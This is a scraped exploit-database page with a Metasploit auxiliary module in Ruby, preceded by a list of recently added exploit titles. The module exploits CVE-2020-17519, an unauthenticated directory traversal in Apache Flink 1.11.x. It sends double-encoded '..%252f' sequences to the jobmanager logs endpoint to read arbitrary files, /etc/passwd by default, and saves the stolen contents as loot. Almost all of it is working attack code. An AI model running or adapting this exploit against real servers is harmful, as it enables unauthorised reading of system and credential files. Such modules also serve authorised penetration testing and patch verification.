206c9f4f7e
9 changes to exploits/shellcodes dnsrecon 0.10.0 - CSV Injection PHP Handicapper - 'Process_signup.php' HTTP Response Splitting PHP Handicapper (2005) - 'Process_signup.php' HTTP Response Splitting Life Insurance Management System 1.0 - Multiple Stored XSS Online Doctor Appointment System 1.0 - Multiple Stored XSS Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated) Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit) WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit) Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit)
72 lines
No EOL
2.9 KiB
Ruby
Executable file
72 lines
No EOL
2.9 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Auxiliary::Scanner
|
|
include Msf::Auxiliary::Report
|
|
|
|
def initialize(info = {})
|
|
super(update_info(
|
|
info,
|
|
'Name' => 'Apache Flink File Read Vulnerability',
|
|
'Description' => %q{
|
|
This module exploits an unauthenticated directory traversal vulnerability
|
|
in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well),
|
|
allowing arbitrary file read with the web server privileges
|
|
},
|
|
'Author' =>
|
|
[
|
|
'0rich1 - Ant Security FG Lab', # Vulnerability discovery
|
|
'Hoa Nguyen - Suncsr Team', # Metasploit module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
['CVE', '2020-17519'],
|
|
['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
|
|
['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
|
|
],
|
|
'Privileged' => false,
|
|
'Platform' => ['php'],
|
|
'Arch' => ARCH_PHP,
|
|
'Targets' => [['', {}]],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Jan 05 2021'
|
|
|
|
))
|
|
|
|
register_options([
|
|
OptInt.new('DEPTH',[true,'Traversal Depth',12]),
|
|
OptString.new('FILEPATH',[true,'The path file to read','/etc/passwd'])
|
|
])
|
|
end
|
|
|
|
def run_host(ip)
|
|
traversal = '..%252f' * datastore['DEPTH']
|
|
filename = datastore['FILEPATH'].gsub("/","%252f")
|
|
filename = filename[1, filename.length] if filename =~ /^\//
|
|
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path,'jobmanager','logs',"#{traversal}#{filename}"),
|
|
})
|
|
|
|
fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
|
|
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
|
|
|
|
print_status('Downloading file...')
|
|
print_line("\n#{res.body}\n")
|
|
fname = datastore['FILEPATH']
|
|
path = store_loot(
|
|
'apache.traversal',
|
|
'text/plain',
|
|
ip,
|
|
res.body,
|
|
fname
|
|
)
|
|
print_good("File saved in: #{path}")
|
|
end
|
|
end |